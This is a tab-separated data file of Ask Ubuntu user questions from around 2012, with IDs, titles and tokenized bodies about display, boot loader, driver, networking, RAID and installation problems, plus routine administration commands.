141515	erratic display behaviour on 12.04 using an asus zenbook	when i first plugged in my 23 inch monitor through the mini-vga port , everything worked ... both display were detected , and worked . on the second or third plug in , the internal display would turn off , and only the external display would work . when i try to 'detect monitor ' , i got `` could not set the configuration for crtc 63 '' a few times . now , when i plug in the external display , i get a screen full of orange color on the external display , and the laptop display turns off . the only way to get things back is to force turn off the laptop and restart . unplugging/replugging monitor does n't work , and seems like ubuntu crashes . can anyone help ?
141516	gimp not showing up in launcher	when i start gimp , it shows up in the launcher briefly , vibrates , then disappears . it 's also missing from alt+tab . super+w shows it though . is there a fix ?
141517	installtion failed a .deb package	i try to install a .deb package with terminal use sudo dpkg -i *.deb but show this error dpkg : error processing pydict.deb ( -- install ) : parsing file '/var/lib/dpkg/tmp.ci/control ' near line 8 package 'pydict ' : duplicate value for `architecture ' field errors were encountered while processing : pydict.deb
141520	can not access file that stored in ubuntu	i have two os`s in my pc ubuntu and window 7 . i can easily access files stored in windows from ubuntu . but i ca n't seen my ubuntu files when i am running windows os . i have installed ubuntu and window 7 in different drive . so , how can i access my ubuntu os stored files in windows ?
141521	how to change folder icon	i would like to change a folder icon to a .ico file how to do it ?
141524	picasa 3.9 install is broken , places feature does n't work	i had picasa 3.9 working well with precise pangolin 12.04 yesterday but now i tried to use the maps feature . i 've broken my picasa install . i have tried to uninstall and to remove all picasa files , but after a reinstall i have the same problem . is there a fix for the places feature ? do i have to have google earth installed to make it work ?
141528	rollback from 12.10 to 12.04	i have accidentally updated my stable ubuntu 12.04 to 12.10 and facing lots of problems how do i roll back to 12.04 , i do n't want to format again because tons of applications already installed please help me .
141530	6tb hfs+ raid will not mount	i want to connect my extrenal hfs+ formated raid 5 6tb to ubuntu . it shows the drive on the desktop , but when i click on it , it say the 6tb volume is to big to mount .
141537	how do i get my ( ubuntu certified ) dell n5050 's webcam to work with google video chat and skype using version 12.04 ?	i changed the os on my dell n5050 to ubuntu 12.04 from windows 7 , and nowo cheese is the only thing willing to talk with the laptop 's camera . is there a download or `` sudo apt-get '' command set i can use to get my system to interface right ?
141538	how to make alt + click work with gnome panel in 12.04 ?	i am using 12.04 with gnome 3 . super + alt + right click works in gnome classic . however , alt + click does n't work with gnome panel . normally , it should bring up a way to customize the panel .
141547	why ca n't i upgrade from 10.10 to 11.04 any more ?	this is what i get when trying to upgrade 10.10 server to natty . $ do-release-upgrade checking for a new ubuntu release get:1 upgrade tool signature [ 198b ] get:2 upgrade tool [ 182b ] fetched 380b in 0s ( 0b/s ) authenticate 'natty.tar.gz ' against 'natty.tar.gz.gpg ' exception from gpg : gnupg exited non-zero , with code 1 debug information : gpg : signature made thu 20 oct 2011 10:58:12 bst using dsa key id 437d05b5 gpg : /tmp/update-manager-bkm3os/trustdb.gpg : trustdb created gpg : bad signature from `` ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > '' authentication failed authenticating the upgrade failed . there may be a problem with the network or with the server . i am using apt-cache proxy defined in /etc/apt/apt.conf.d/90-apt-proxy.conf apt-get update/upgrade is working normally ( using proxy apt proxy ) server does n't have direct internet connection . no x installed . # lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 10.10 release : 10.10 codename : maverick # uname -a linux host1 2.6.35-30-server # 56-ubuntu smp mon jul 11 21:37:42 utc 2011 x86_64 gnu/linux any help will be appreciated .
141549	windows xp - ubuntu 12.04 dual boot problem	boot repair output installed 12.04 alongside xp , but no grub selection at boot , defaults to ubuntu only . i 've tried reinstalling several times . i can boot to xp by using boot repair and then can boot back to ubuntu by using repair off of usb , but i 've still not been able to create the boot option for both ? what settings in boot repair should i use to achieve this ? or is there another way ? speak slowly as i am n00b .
141550	installation issue	i 'm sure this has an easy fix , but i do n't want to mess anything up . so i just now have put ubuntu onto my laptop ( sort of ) . i want to install it alongside windows , but i could n't get the microsoft installer to work . so i burned a disk and now ubuntu is on my computer . i still have the disk in my computer and it 's on the `` demo '' mode . when i go to actually install it , the installation wizard says i have multiple operating systems on my computer and it wants me to choose a partioner . or something like that . please solve my problem magic person . ( btw the software versions : windows 7 and ubuntu 12.04 )
141552	creating volume group in nova-volume juju charm	is it required to setup a volume group before deploying the nova-volume juju charm ? i am trying to install openstack locally on my ubuntu vm running in local ( lxc ) mode and get an error that either the physical volume does not exist or loopback is not found . looking at the hooks i can not see if it tries to create the loopback volume group . the loopback error message from the juju debug log is shown here : 2012-05-24 11:30:53,876 unit : nova-volume/4 : hook.output info : processing triggers for initramfs-tools ... 2012-05-24 11:30:56,306 unit : nova-volume/4 : hook.output error : losetup : could not find any loop device . maybe this kernel does not know about the loop device ? ( if so , recompile or `modprobe loop ' . ) 2012-05-24 11:30:56,307 unit : nova-volume/4 : hook.output error : 2012-05-24 11:30:56,311 unit : nova-volume/4 : hook.output error : failed to setup loop device for /var/lib/nova-volumes/my-vol.img 2012-05-24 11:30:56,524 unit : nova-volume/4 : unit.hook.api info : error : failed to get device for /var/lib/nova-volumes/my-vol.img|2g 2012-05-24 11:30:56,526 unit : nova-volume/4 : hook.output info : { } 2012-05-24 11:30:56,547 unit : nova-volume/4 : hook.output debug : hook install exited , exit code traceback ( most recent call last ) : failure : juju.errors.charminvocationerror : error processing '/var/lib/juju/units/nova-volume-4/charm/hooks/install ' : exit code 1. . 2012-05-24 11:30:56,548 unit : nova-volume/4 : hook.executor debug : hook error : /var/lib/juju/units/nova-volume-4/charm/hooks/install error processing '/var/lib/juju/units/nova-volume-4/charm/hooks/install ' : exit code 1 . 2012-05-24 11:30:56,552 unit : nova-volume/4 : statemachine debug : unitworkflowstate : executing error transition error_install , error processing '/var/lib/juju/units/nova-volume-4/charm/hooks/install ' : exit code 1 . 2012-05-24 11:30:56,577 unit : nova-volume/4 : statemachine debug : unitworkflowstate : transition error_install ( none - > install_error ) { } 2012-05-24 11:30:56,587 unit : nova-volume/4 : statemachine debug : unitworkflowstate : transition complete error_install ( state install_error ) { } 2012-05-24 11:30:56,605 unit : nova-volume/4 : juju.agents.unit debug : configuration changed 2012-05-24 11:30:56,606 unit : nova-volume/4 : juju.agents.unit debug : configuration updated on service in a non-started state 2012-05-24 11:30:56,611 unit : nova-volume/4 : juju.agents.unit info : no upgrade flag set .
141553	how to enable wireless network for standard users ?	how can i allow standard users to connect to wireless network without administrator password ? it 's simple question . i need any positive answer .
141557	broadcom netxtreme bcm5721 gigabit ethernet unable to connect to internet	i installed ubuntu server 12.04 on an ibm machine which has a broadcom netxtreme bcm5721 gigabit ethernet pci express card . i was able to connect to the internet during and after the installation . i installed ubuntu-desktop to provide a gui to manage the server . after installing the de , i changed the settings of eth0 in /etc/network/interfaces file to static ( from dhcp ) . i re-started the machine . now , all the machines connected to the internal lan can connect to this server and vice versa . but this server machine is unable to connect to the internet . on clicking on the network manager icon on the top panel , it says that the broadcom device is `` not managed '' . clicking on `` connection information '' shows `` no active connections '' . so , the server is accessible via the internal lan but the server is not able to connect to the internet . can anyone help regarding this problem ?
141560	dns sometimes works , but it is very slow .	i am having dns problems since upgrading to ubuntu 12.04 ( precise pangolin ) from ubuntu 10.04 ( lucid lynx ) yesterday . dns sometimes works , but it is very slow . i have read the blog post dns in ubuntu 12.04 . `` i really don’t want a local resolver , how can i turn it off ? to turn off dnsmasq in network manager , you need to edit /etc/networkmanager/networkmanager.conf and comment the “dns=dnsmasq” line ( put a # in front of it ) then do a “sudo restart network-manager” . '' i do not have this line to comment . checking in synaptic package manager reveals that dnsmasq is n't installed ( dnsmasq-base is ) . editing and creating connections using the networkmanager gui ( and specifying dns servers ) does n't help ; ubuntu is not respecting user gui set dns servers . should these gui tools not work ? `` i use a static ip address configuration , where should i put my dns configuration ? the dns configuration for a static interface should go as “dns-nameservers” , “dns- > search” and “dns-domain” entries added to the interface in /etc/network/interfaces '' are any examples of this available ? my /etc/network/interfaces is extremely sparse . for now , i have edited /etc/resolv.conf replacing nameserver 127.0.0.1 with that of my dns server ( my broadband router ) , but i do n't know how long this fix will last before the file is overwritten by this new system ( dnsmasq ? ) .
141563	is architecture based update possible or is it necessary	i am currently running ubuntu 12.04 64 bit . running apt-get update & & apt-get upgrade starts the updating and upgrading procedure . i was wondering , since i have installed 64 bit amd64 system then why does the command checks even the 32 bit i386 repositories get:14 http : //ppa.launchpad.net precise/main amd64 packages [ 658 b ] get:15 http : //ppa.launchpad.net precise/main i386 packages [ 658 b ] this is common for almost all the official ubuntu repositories . are they mandatory required for update process or can they be removed if not required by the installed architecture at all .
141564	what is snmp used for ?	can anyone explain to me what snmp is used for in a home desktop ubuntu install ? is it needed ? there is no network of any kind other than the cable modem .
141565	unable to enter and plot negative data in scidavis and qtiplot	i have been using scidavis for plotting and a variety of numeric tasks . however , now , when i try to enter negative data into a scidavis table , the data is just ignored . i am using my system default decimal format ( that is 1 000,0 with , as the data separator comma ( . in us format ) . i know that the development of scidavis is pretty much dead right now . however , the same problem occured in the ( actively developed ? ) qtiplot . has anyone got any ideas about what might fix my issue ?
141573	software to convert mp3 to midi and mp3 to karoke	i am looking for software that can convert mp3 files to midi and karoke formats .
141574	how to teach firefox to open rar archives	when i click on the .rar file in firefox it offers either to open it with a default application or to save it to disk . however , the default app for .rar is set to gedit ( ? ) so how do i change that , so that ff will offer to open .rar files with archive manager ? i tried editing preferences/applications , but i need it to ask me first what to do and then open it ot save it . thanks !
141576	how can i install grub customizer without using any command ?	i want to install grub customizer but unable to install it from command line . is there any setup file of this tool like a setup of any software in windows , so i can install it from gui
141588	how can i install 'adobe flash player ' offline ?	my friend has a computer with ubuntu 12.04 32 bit , but he has no internet connection . he 'd like to install the adobe flash player on his computer . how to do that ?
141590	replacing pclinux with ubuntu	i have a dual boot xp and pclinux desktop and want to replace pclinux which is on the boot drive . i still want to maintain xp on one drive with ubuntu on the other . so far my ubuntu knowledege is on a netbook and i like it but find the pclinux not so user friendly after xx ? number of years using windows .
141594	where are the different app icon sizes submitted through the app developer site used ?	when i submit an application through the app developer process in myapps , i 'm asked to submit icons in different sizes : 128px , 64px , 32px , 16px . where is each of these icon sizes used when my app is in ubuntu ?
141596	unable to install the 64-bit version of ubuntu on both a dell xps 15z or a dell xps 8300 .	i have a dell xps 15z laptop with an intel core i7 , 6 gb ram , and an nvidia graphics card . i can install the 32-bit version of ubuntu with no problems at all . but when i try to install the 64-bit version , as soon as i select the optical drive to boot from ( e.g . cd/dvd ) the screen goes blank apart from a flashing cursor and nothing happens . i 've tried booting from cd , dvd , usb , external harddrive and always the same problem . i have a similar problem with my dell xps 8300 desktop . it is absolutely fine with the 32-bit ubuntu but when i attempt to boot from cd it just goes straight into loading windows . i would like to install and use the 64-bit version of ubuntu as i am processing very large genomic datasets .
141597	llvm/clang 3.1 & libc++	has anybody built and setup an ubuntu precise ppa for llvm/clang 3.1 ? a bonus would be to have a recent version of libc++ integrated into it aswell .
141602	after installing ubuntu alongside windows i do not see the dual boot option to start windows 8 .	i had windows 8 installed on my 500gb hard drive and it was working ok . i then did a clean installation of ubuntu 12.04 partitioning windows 8 . now that i have installed ubuntu 12.04 i can not see the disks partitioning when starting up my machine . i boot straight into ubuntu . however , when i 'm logged into ubuntu , i can see the windows 8 partition and files in devices . any ideas on how i can resolve this problem ?
141603	enabling the keyboard lamp on x220 ?	fn-pgup key is supposed to turn on the little keyboard lamp on lenovo . it used to work on my t61 and older models , but no longer on x220 . ideas anyone ?
141604	mysql workbench will not open on my ubuntu 12.04	i have install mysql-workbench version 5.2.38+dfsg-3 via ubuntu software center on my ubuntu 12.04 laptop for some week ago , this work fine until now ! now when i press in the mysql-workbench icon in the unity lanuncher , it just start opening and then nothing happens : ( if i try start it via the terminal : i get this : http : //paste.ubuntu.com/1004428/ update : i can open it via : sudo mysql-workbench but then is can save my passwords.. it says : voidcode @ voidcode-aspire-5750 : ~ $ sudo mysql-workbench [ sudo ] password for voidcode : ** message : gnome keyring daemon seems to not be available . stored passwords will be lost once quit ready .
141606	how to fix `` the system is running in low-graphics mode '' error ?	note : this is an attempt to create a canonical question that covers all instances of `` low-graphics mode '' error that occurs to a user , including but not limited to installation of wrong drivers , incorrect or invalid lightdm greeters , low disk space , incorrect installation of graphics card like ati and nvidia , incorrect configuration of xorg.conf file while setting up multiple monitors among others . if you are experiencing the `` low-graphics mode '' error when trying to login but none of the following answers work for you , please do ask a new question and then update the answers of this canonical question as and when your new question gets answered . when i try to boot into my computer , i am getting this error : the system is running in low-graphics mode your screen , graphics cards , and input device settings could not be detected correctly . you will need to configure these yourself . how do i fix the failsafe x mode and login into my computer ? answer index : the greeter is invalid
141611	how to reset my password without rebooting ?	i lost my password to a vm running 11.04 , but have ssh access via public key authentication . is there any way i can reset the password without a reboot ? ( this is to avoid downtime of services it 's running . )
141616	rtl8190 unclaimed ?	i have recently installed ubuntu and i 'm having problems with my ( rtl8190 ) card . i followed the steps listed here - https : //help.ubuntu.com/10.04/internet/c/troubleshooting-wireless.html after using the command `` sudo lshw -c network '' i got the following output : *-network description : ethernet interface product : rtl8111/8168b pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth0 version : 06 serial : 10:78 : d2:73:9f:0d size : 10mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=rtl_nic/rtl8168e-2.fw latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:42 ioport : d800 ( size=256 ) memory : f8fff000-f8ffffff memory : f8ff8000-f8ffbfff *-network unclaimed description : network controller product : rtl8190 802.11n wireless lan vendor : realtek semiconductor co. , ltd. physical id : 1 bus info : pci @ 0000:04:01.0 version : 00 width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list configuration : latency=64 maxlatency=64 mingnt=32 resources : ioport : e800 ( size=256 ) memory : fbfff000-fbffffff i proceeded to install the ndisgtk package and downloaded the `` net819xp.inf '' driver . using the windows wireless drivers app . i selected the .inf file but it said there was an error . i attempted to select it again but it said it was already installed . when i run the original command again it still lists the card as 'unclaimed ' . anyone know how to get it working ? thanks .
141617	how do i connecting my dell e6410 to a tv via displayport ?	i am a week into getting used to linux using ubuntu 12.04 and i am really impressed with it . i 'm having a bit off\ difficulty connecting my dell laptop to my digital tv using the displayport . i know it works using windows but i have n't managed to figure out how to hook it up using ubuntu .
141623	virtualbox does n't restore saved ubuntu machine state ?	i 'm running ubuntu 12.04 inside virtualbox on windows xp prof. everything works fine . i 'm running it at startup , but i have a problem with rebooting . when i reboot my computer ( winxp ) now the state of the virtual ubuntu 12.04 is n't saved . after the reboot the virtualbox starts from the beginning . is there an option that windows xp could send some signal to the virtual box to safely close the instance before the host reboot ?
141624	gdk-pixbuf-csource tool	when i tried to install gsteditor-0.10.3.2 in my ubuntu 10.10 , en error like this appeared in the termina window configure : error : * you need the gdk-pixbuf-csource tool which is installed * from gtk+ 2.0 's gdk-pixbuf . * either the location where you installed your gtk+ 2.0 is not in your path or something is screwed up with your ** gtk+ 2.0 installation i couldnot find help from somewhere else.. i am totally new to ubuntu and desperately in ned of helpp
141625	microphone does n't work after rebooting on a macbook 2.1	i am running xubuntu 12.04 on a macbook 2.1 intel duo . but the problem existed on ubuntu 12.04 too . after booting up , the internal microphone does n't work . after opening the pulse audio settings and changing the configuration , it will work after . however after suspending or shutting down , the microphone will not work again until changing the configuration again , even though the actual config did n't change . right now i have to always switch between the anglog stereo duplex and the analog surround 4.0 ... each time . is there anyway to get this microphone issue fixed ? it seems like a problem with pulse audio .
141626	how do i make gvim start on desktop ?	i mean , whenever i start and save files using gvim , have it know to save the files into my home directory . this is annoying because each time i save any file using any program then i save it on desktop first , and then categorize and move it to their specific folders . while looking in my home directory , i ca n't see any hidden files named .vimrc or .gvimrc , instead i am seeing a .viminfo file . which does n't seem to have any preference information .
141629	gnome shell choppy/flicking after -- replace ( nvidia gfx )	after regular updates/upgrades my gnome-shell stopped working and got into fallback mode . i have tested installing nvidia drivers ( i have an nvidia gfx ) , removing them , blacklisting nouveau and other basic stuff i have found here on the question-board but none seem to work so far . with a gnome shell -- replace i can get the shell running . but its always buggy/choppy and unusable . even with the windowskey / superkey the dashboard just flickers on/off/on/off and parts of the ui just vanishes and reappers all the time . like i said ... unusable . i 'm using : gnome shell 3.4.1 ubuntu 12.04 any ideas i can tryout ? thanks for the help in advance . edit : gnome-shell only works with nouveau . nvidia does give me an error when i try -- replace errormessage : xlib : extension `` glx '' missing on display `` :0 '' . seems like my nvidia drivers are not loading . in jockey-gtk its displaying : activated but not in use solution : restart & press shift . start in rescue mode . start failsafex to unlock filesystem & cancel back to terminal . open root terminal cd /tmp/ wget download.nvidia.com/xfree86/linux-x86/285.05.09/nvidia-linux-x86-285.05.09.run chmod +x nvidia-linux-x86-285.05.09.run sudo ./nvidia-linux-x86-285.05.09.run you can also get the latest drivers as @ dibs suggested . for me on my old system these drivers ran just fine . make sure to blacklist nouveau , tho .
141636	how do i get a mac-like gnome panel/menu bar ( which changes accordingly to the active window ) .	so in firefox , i would have the top panel change to file edit view ... etc and in photoshop it would be file edit image select ... etc . on top of that , this function would make those menu bars in the windows themselves obsolete , so i need to get rid of those .
141640	windows 7 does not boot correctly on a triple boot system with windows 8 ( consumer preview ) , windows 7 and ubuntu	currently on my laptop i have win7 , win8 ( consumer preview ) , and ubuntu 12.04 . i am having a problem booting win7 when i boot the computer the first screen i get is the grub boot manager screen which has menu entries for ubuntu and windows 8 . if i want to boot into windows 7 i have to select the windows 8 loader and then select windoes 7 from the windows boot menu . due to the win8 loader being a little silly it then reboots the pc in order to load win7 , however it just takes me back to the grub2 and i have to select the win8 loader again and then win7 will boot . this is faily long winded and unecessary . i would much prefer it if i could just add windows 7 to the grub menu and select it from there rather than boot windows 8 , select windows 7 , and reboot again . my only concern being that windows 8 has removed/replaced the win7 bootloader . has anyone come across this problem ?
141647	ca n't login to unity-3d	whenever i chose ubuntu ( unity-3d ) from login .it results an empty background without unity launcher and desktop icons .. i switched to console mode and tried unity -- reset and unity -- replace . both stucks at segmentation fault . i reinstalled unity , still no luck thanks in advance edit : i tried many solutions , but none of them worked for me , so i reinstalled ubuntu , and voted for close
141653	preventing users from changing pinned applications in the launcher ?	i am currently trying to setup the ubuntu clients in my work place to have specific programs in the launcher ( e.g . matlab ) , which i was actually able to do successfully using this method : how to make applications pinned in launcher appear for all users ? however , this only works for users logging in for the first time . what i need is to be able to create something like the schema override that will apply when the machine reboots or users login ( either will be enough ) . can anyone help me ?
141656	ubuntu 12.04 installer does not see windows already installed on my computer	when i just tried to install ubuntu 12.4 alongside windows 7 on my new `` hp pavilion 64k desktop with windows 7 '' computer , ubuntu said this computer has no detected operating system and someone said i suggest you chkdsk your windows partition . i also suggest you resize the ntfs in windows , then install ubuntu to the free space . in response , i did the following : to shrink a simple or spanned volume using the windows interface in disk management , right-click the simple or spanned volume you want to shrink . click shrink volume ... . follow the instructions on your screen . when i tried to install ubuntu 12.4 again after doing that , i received the same error . i was going to undo what i did but i see that i lose 1g when i do that , so now what do i do ? it says i can do a new simple volume and maybe then the space will no longer be unallocated . please help me . i think i have a bad ubuntu cd , because from my research , i see that i am not supposed to get the `` no detected operating system '' message . i hope i did not mess up my computer with a bad cd ; please advise . ok , i think i am following what you said about how to edit my question , irrational john . i did chkdsk as you and actionparsnip ( andrew-woodhead666 ) told me to , and i also did a lot of other things before i found out how to chkdsk . no problems . thank you . then i put back the space ( extended ) i took from system . i still was only able to put back 15 and not 16 so it is up to 99mb not back to 100mb . then i shrank hp ( c ) as you told me , to 10 13,240 mb which is ( 12.93gb unallocated ) . i did not change it into ntsf by doing the ( new simple volume action ) i just left it . then i tried to install from the ubuntu 12.04 livecd amd64 and it gave me the results it was sometimes giving me before , which is result ( that ubuntu ) does not tell me whether i have or have not an already-installed windows 7 . it just goes to a window that would have showed me information on what i have and on the bottom device for boot loader installation /dev/sda and the options back , quit , or install ( i think it is the installation type window ) . therefore i do what i have been doing and i quit . what do i do now ? sorry that it seems like i can not do anything on my own . on the youtube video how to install ubuntu dual-boot alongside windows , ubuntu gets installed so easily . the installation option page gives three options including dual installation and the disk even lets you use a slider to slide to the size of the partition size you want . yet my ubuntu livecd is a mess . i checked it as one of you guys told me to and got back information that it is good . oh , well . this guy says you should press a control key to tell which device you are using to install ubuntu before the screen comes up ... i guess 'cause it is old . this page also shows you easy stuff that do not show up on my cd : how to dual-boot ubuntu and windows 7 p.s . i saw this on the windows 7 `` create a boot partition '' website : to create a boot partition warning warning if you are installing different versions of windows , you must install the earliest version first . if you do n't do this , your computer may become inoperable . open computer management by clicking the start button picture of the start button , clicking control panel , clicking system and security , clicking administrative tools , and then double-clicking computer management.â administrator permission required if you 're prompted for an administrator password or confirmation , type the password or provide confirmation . in the left pane , under storage , click disk management . right-click an unallocated region on your hard disk , and then click new simple volume . in the new simple volume wizard , click next . type the size of the volume you want to create in megabytes ( mb ) or accept the maximum default size , and then click next . accept the default drive letter or choose a different drive letter to identify the volume , and then click next . in the format partition dialog box , do one of the following : if you do n't want to format the volume right now , click do not format this volume , and then click next . to format the volume with the default settings , click next . for more information about formatting , see formatting disks and drives : frequently asked questions . review your choices , and then click finish . and i saw the following on yet another page : formatting disks and drives : frequently asked questions hard disks , the primary storage devices on your computer , need to be formatted before you can use them . when you format a disk , you configure it with a file system so that windows can store information on the disk . hard disks in new computers running windows are already formatted . if you buy an additional hard disk to expand the storage of your computer , you might need to format it . storage devices such as usb flash drives and flash memory cards usually come preformatted by the manufacturer , so you probably wo n't need to format them . cds and dvds , on the other hand , use different formats from hard disks and removable storage devices . for information about formatting cds and dvds , see which cd or dvd format should i use ? warning warning formatting erases any existing files on a hard disk . if you format a hard disk that has files on it , the files will be deleted . what i did was : i got to the computer management section , then i clicked on the drive `` hp ( c ) '' and it became striped to show it was selected . then i clicked on action , selected all tasks and then selected shrink volume and then chose how much space from what it was giving me that i wanted ( 12.93gb ) . and that was all i did . then i tried to instal ubuntu . i never got to the third screen that is in the video i linked earlier ( the youtube video with the english guy ) . i also did not get the fourth screen that allows you to select a partition size . what i got was the second installation type window shown on the linux bs dos.com page that i linked , and it showed no information about any drives ( no drives/partition or stuff was shown ) only the boot loader statement and the dev/sda bar and that 's why i did not press install but chose to quit . sorry i just now saw your answer irrational john . i shrank hp ( c ) by 12.93gb my unallocated space is now 12.93gb hp ( c ) = 907.17gb ntsf ... you are correct with everything you said this is what i read on http : //windows.microsoft.com/en-us/windows7/create-a-boot-partition : create a boot partition you must be logged on as an administrator to perform these steps . a boot partition is a partition that contains the files for the windows operating system . if you want to install a second operating system on your computer ( called a dual-boot or multiboot configuration ) , you need to create another partition on the hard disk , and then install the additional operating system on the new partition . your hard disk would then have one system partition and two boot partitions . ( a system partition is the partition that contains the hardware-related files . these tell the computer where to look to start windows . ) to create a partition on a basic disk , there must be unallocated disk space on your hard disk . with disk management , you can create a maximum of three primary partitions on a hard disk . you can create extended partitions , which include logical drives within them , if you need more partitions on the disk . [ picture of disk space in computer management unallocated disk space ] if there is no unallocated space , you will either need to create space by shrinking or deleting an existing partition or by using a third-party partitioning tool to repartition your hard disk . for more information , see can i repartition my hard disk ? to create a boot partition warning warning if you are installing different versions of windows , you must install the earliest version first . if you do n't do this , your computer may become inoperable . open computer management by clicking the start button picture of the start button , clicking control panel , clicking system and security , clicking administrative tools , and then double-clicking computer management.â administrator permission required if you 're prompted for an administrator password or confirmation , type the password or provide confirmation . in the left pane , under storage , click disk management . right-click an unallocated region on your hard disk , and then click new simple volume . in the new simple volume wizard , click next . type the size of the volume you want to create in megabytes ( mb ) or accept the maximum default size , and then click next . accept the default drive letter or choose a different drive letter to identify the volume , and then click next . in the format partition dialog box , do one of the following : if you do n't want to format the volume right now , click do not format this volume , and then click next . to format the volume with the default settings , click next . for more information about formatting , see formatting disks and drives : frequently asked questions . review your choices , and then click finish . i did what you told me , @ irrational john , and this is the `` screenshot '' : i entered ubuntu @ ubuntu : ~ $ sudo os-prober the computer did not respond , so i entered ubuntu @ ubuntu : ~ $ sudo apt-get -y remove dmraid to which the computer responded with reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : dmraid 0 upgraded , 0 newly installed , 1 to remove and 0 not upgraded . after this operation , 141 kb disk space will be freed . ( reading database ... 147515 files and directories currently installed . ) removing dmraid ... update-initramfs is disabled since running on read-only media processing triggers for man-db ... i then entered ubuntu @ ubuntu : ~ $ sudo os-prober and the computer responded with /dev/sda1 : windows 7 ( loader ) : windows : chain /dev/sda3 : windows recovery environment ( loader ) : windows1 : chain ubuntu @ ubuntu : ~ $ @ obsessivefoss i do n't know what a grub menu is , and i do not know what the ubuntu boot option is . the answer you gave to me was correct . this one { this apparently removes the dmraid metadata . after doing that , you can use the desktop icon install ubuntu 12.04 lts to start the ubuntu installer . this time the installation type window should contain the option to install ubuntu alongside windows 7 . } this is what i decided to do . i did not see the rest of your help 'til now . nevertheless ... . i think the best thing for me to do now is to get a cheap used laptop and either do a dual installation or just install ubuntu on to it . this way if i have any issues that i can not solve like the one i had here , at least i will still have a usable computer to work on and to use to get answers with because i am not an expert like the people on this forum . thanks a lot . i will try to keep learning and do research enough to some day help someone else .
141665	puppet-like configuration tool ?	in the business environment i work in , we tried to use puppet to manage both our linux and windows machines . this includes tasks like installation of programs that are needed for our department and also managing what programs are easily accessible to all employees . we decided not to use puppet due to the many dependencies it has and other complications , however we still want to employ the same idea of managing both linux and windows . is there another program or way to do this ?
141669	creating properly aligned partitions on a replacement disk	i 've a typical small office server with two hard disks configured for raid-1 ( mirroring ) . each disk has several partitions : one for swap , the others paired in several /dev/mdx arrays . every couple of years one of the disks dies and is replaced . the replacement typically goes something like this : # copy partition table from the remaining good disk to the empty replacement disk # ( instead of /dev/good_disk and /dev/new_disk i use /dev/sda and /dev/sdb , as appropriate ) sfdisk -d /dev/good_disk | sfdisk /dev/new_disk # install boot loader grub-install /dev/new_disk # create swap partition reusing the same uuid , so i do n't need to edit /etc/fstab mkswap /dev/new_disk1 -u xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx # hot-add the new partitions to my raid arrays mdadm /dev/md0 -a /dev/new_disk2 mdadm /dev/md1 -a /dev/new_disk5 mdadm /dev/md2 -a /dev/new_disk6 mdadm /dev/md3 -a /dev/new_disk7 mdadm /dev/md4 -a /dev/new_disk8 the disks were originally partitioned with cfdisk back in 2009 , and so the partition table is aligned traditionally to cylinder boundaries ( 255 heads * 63 sectors ) . this is not the optimum configuration for new 4k-sector drives . my question is : how can i create a set of partitions for the new disk and ensure they 're properly aligned , and have correct sizes for my raid arrays ( rounding up is acceptable , i suppose , but rounding down is definitely not ) ?
141671	keep getting messages about internal system errors	i keep getting popups about internal system errors ( see screenshot below ) on irregular intervals ( several times a day ) , that i do n't know what to do about . if i continue through the dialog and try to report the error back to the ubuntu project , i get a message stating that development on this version of ubuntu has been completed , and that i should ask for help here if i do n't know what to do about it . i do n't . if i show the details of the error message , the `` executable path '' parameter shows /usr/share/apport/apport-gpu-error-intel.py . is this a bug i should report to launchpad , or just a configuration error somewhere ? if it 's a bug , how do i collect the data i ( and the devs ) need ? update in response to comment : i am running an asus n53sn , sporting an intel core i7 2630qm cpu and an nvidia geforce 550m gpu .
141677	error at the base system level of ubuntu server installation	i tried installing ubuntu server alongside my windows 7 from a usb drive . after the partitioner level , the installation gives this : warning : file : ///cmrom/pool/main/c/coreutils/coreutils_8.5-1ubuntu6_amd64.deb was corrupted . should i download another server file ? or is there another way to solve this problem ? thanks in advance
141682	how to make the clock sync automatically after suspension of a virtual machine	i run ubuntu 10.04 64-bit as a guest os on a vmware player machine over windows 7 . i have the clock displayed in the panel and the location set to my time zone . occasionally , i close vmware player using the vm - > power - > suspend menu . when i turn the ubuntu on again , the clock is no longer in sync with the real system clock . how can i make the clock to auto sync when the system is resumed from suspension ?
141684	how can i execute a terminal command before running the live cd installer ?	when i run the live cd installer , the installation gets stuck at `` select a picture for the specified account . '' i 've found that is an incompatibility problem with my webcam and the only way to fix this is running the terminal command : sudo modprobe -r uvcvideogp this must be run before doing the installation . but because its a live cd , i do n't know exactly how to do that . i 've tried opening the terminal normally and executing this command , but i open the setup and still stuck . how can i run this command in a terminal on the live cd ?
141692	youtube movies are playing too fast with chrome	i 've got movies playing in fast forward in youtube html 5 mode if i play it in google chrome . if i open it with firefox , it plays well . any ideas ?
141693	update the zsh autocorrection for commands	i use zsh and it 's great . but the autocorrection is not smart at all . i think it is not updated at any time . so i get the following often : dennis @ ponyboy ~ % sudo aptitude search zsh zsh : correct 'aptitude ' to '.aptitude ' [ nyae ] ? nyae is nothing like `` forever '' or `` never '' . i am gone insane . okay . autocorrection is cool . but how do i update ?
141694	sudo apt-get install build-essential does not work	sudo apt-get install build-essential does not work in my ubuntu 12.04. when i tried to install it does not work .
141701	what is the difference between libre office and open office ? what are the advantages/disadvantages of each ?	i am using openoffice before installing ubuntu but libreoffice is default in ubuntu what is the difference between libreoffice and openoffice ? what are the advantages/disadvantages of each ?
141702	how to run a script after the system resumes from hibernate ( suspent-to-disk ) ?	i have configured powernap to hibernate ( i.e. , suspend-to-disk ) the machine if idle . in order to save additional power , i have configured my non-root , data disks to spin-down using the hdparm command . unfortunately , this setting gets lost after resuming from hibernate . i 'd like to run these hdparm command right after the system has resumed . how/where to install them ?
141703	installation of grub boot loader to hard disk fails	i am installing ubuntu server 12.04 lts on an ibm 3650 m2 with a hardware raid5 with three partitions : sda1 /boot - 1 gb , ext3 sda2 lvm - 1 tb , ext4 sda3 swap - 24gb during the grub installation , i get a message that the installer failed to load grub on a hard disk and get sent back to the installer menu .
